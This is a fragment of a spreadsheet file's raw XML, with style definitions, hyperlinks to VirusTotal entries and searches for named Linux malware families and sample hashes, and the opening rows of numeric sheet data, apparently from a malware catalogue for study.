    </xf>
    <xf borderId="0" fillId="14" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="15" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="164" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="3" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="1" numFmtId="0" xfId="0" applyFill="1" applyFont="1"/>
    <xf borderId="0" fillId="16" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="17" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="1" numFmtId="3" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="8" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="18" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="18" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="15" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="13" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="3" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="15" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="6" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="18" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="19" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="15" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="4" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="19" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="19" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="20" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="18" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="13" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="14" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="15" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="21" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="15" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="15" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="15" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="1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virustotal.com/gui/search/engines:suspbehav" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/cac4cb7f2f6a2f1f1a06eadbb7e3d41fc987cab24a3df7866cbcb8bf54a115f4" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:linux%20AND%20engines:ipstorm%20AND%20engines:alien" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/985ffee662969825146d1b465d068ea4f5f01990d13827511415fd497cf9db86" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:linux%20AND%20engines:ipstorm%20AND%20engines:alien" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/765a4d57b2db92c2fd904b11a3e2dd26cdaa38843cc1760ae84e3334822bf4c4" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/difference-between-virus-worm-and-trojan-horse/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberfrat.com/how-bots-are-different-from-virus-worms-and-trojans/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1wBmV7QD1RMRLeOAuYdj8zXYH9DlnPO3KhCcPVR86xc0/edit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/87990db7c4d3e07d4c16f45fab3efd1c34bcce27fe692f8e009794bd2ac1db40" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/196eb5bfd52d4a538d4d0a801808298faadec1fc9aeb07c231add0161b416807" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/c0d7eeec4036bd2507153943a3a88dcbc399238860d8776b6581c577b7cd2c62" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/90b61cc77bb2d726219fd00ae2d0ecdf6f0fe7078529e87b7ec8e603008232d5" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/6b667bb7e4f3f2cb6c6f2d43290f32f41ae9f0d6ed34b818d78490050f7582a1" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:linux%20AND%20engines:mozi%20AND%20engines:fritzfrog" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/cdddd240d432b084b2c5cbe6b4a89b39a33d97840630210772b7758ec87dcacd" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/2985786ea833bee477185a5fa6dcaaa975c84b0fae8d219c07a137a1d049c873" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/eda29420aaa9a70d3a552f8950159b2fcbc7c4548831c70152d3077a9f575d8e" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/d1e82d4a37959a9e6b661e31b8c8c6d2813c93ac92508a2771b2491b04ea2485" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:linux%20AND%20engines:yamabot%20AND%20engines:vsntch23" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/b7c35ebf87287fe1f63583848f05c7608cbdb32044fa81a2d8d258faddc93eaf" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:ransomware%20AND%20engines:linux%20AND%20engines:ech0raix%20AND%20engines:svrdu" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:linux%20AND%20engines:ipstorm%20AND%20engines:alien" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/b0ac01090d5c80c422cb9e1fbcec690fecfb95b1ab26881739f27f597bf82b69" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/0ff83f3b509c0ec7070d33dceb43cef4c529338487cd7e4c6efccf2a8fd7142d" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/dca13d4427e79ccda8a300c90099a8eeff8fb5b0d29efdc75691625e44bc40bf" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:linux%20AND%20engines:ipstorm%20AND%20engines:alien" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/5987472321673fd54f2aebcc33ede6541897410df36a7f4a1bd984a2f724e772" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/4aadb47706f0fe1734ee514e79c93eed65e1a0a9f61b63f3e7b6367bd9a3e63b" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/6fe6808b9cfe654f526108ec61cb5211bb6601d28e192cadf06102073b54f69c" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/5fd9ad8c22bedaa17f25d5b2c8d0472487b8f61dea6ff4be33e0f00d581b97d6" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:miner%20AND%20engines:fritzfrog%20AND%20engines:linux" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/5b1b1bd309538b2f8656eca5c0e082229b492feb88f9ed9fe76b768204067b8c" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/08113ca015468d6c29af4e4e4754c003dacc194ce4a254e15f38060854f18867" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:ransomware%20AND%20engines:linux%20AND%20engines:ech0rai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rustotal.com/gui/search/mayhem/comments" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/remaiten/comments" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/gafgyt/comments" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/qbot/comments" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/rexob/comments" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/bashlite/comments" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/luabot/comments" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/hydra/comments" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/kaiten/comments" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/darlloz/comments" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/lion/comments" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/millen/comments" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/lupper/comments" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/snakso/comments" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/ramen/comments" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/home/search" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Linux_malware" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/nuxbee/comments" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/winux/comments" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/winter/comments" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/adm/comments" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/zariche/comments" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/badbunny/comments" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/adore/comments" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/devnull/comments" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/cheese/comments" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/kork/comments" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/hummingbad/comments" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/turla/comments" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/pnscan/comments" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/nyadrop/comments" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/binom/comments" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/42/comments" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/brundle/comments" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/bliss/comments" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/coin/comments" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/search/cephei/comment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inux.die.net/man/2/lin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8.38"/>
    <col customWidth="1" min="3" max="3" width="11.0"/>
    <col customWidth="1" min="4" max="4" width="33.0"/>
    <col customWidth="1" min="14" max="14" width="11.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1"/>
      <c r="B1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1">
        <v>1.0</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E2" s="1">
        <v>48.0</v>
      </c>
      <c r="F2" s="1">
        <v>273.0</v>
      </c>
      <c r="G2" s="4">
        <f t="shared" ref="G2:G15" si="1">sum(H2:K2)</f>
        <v>2</v>
      </c>
      <c r="H2" s="1">
        <v>0.0</v>
      </c>
      <c r="I2" s="1">
        <v>0.0</v>
      </c>
      <c r="J2" s="1">
        <v>2.0</v>
      </c>
      <c r="K2" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1">
        <v>2.0</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E3" s="1">
        <v>16.0</v>
      </c>
      <c r="F3" s="1">
        <v>306.0</v>
      </c>
      <c r="G3" s="5">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H3" s="1">
        <v>0.0</v>
      </c>
      <c r="I3" s="1">
        <v>0.0</v>
      </c>
      <c r="J3" s="1">
        <v>0.0</v>
      </c>
      <c r="K3" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1">
        <v>3.0</v>
      </c>
      <c r="B4" s="3" t="s">
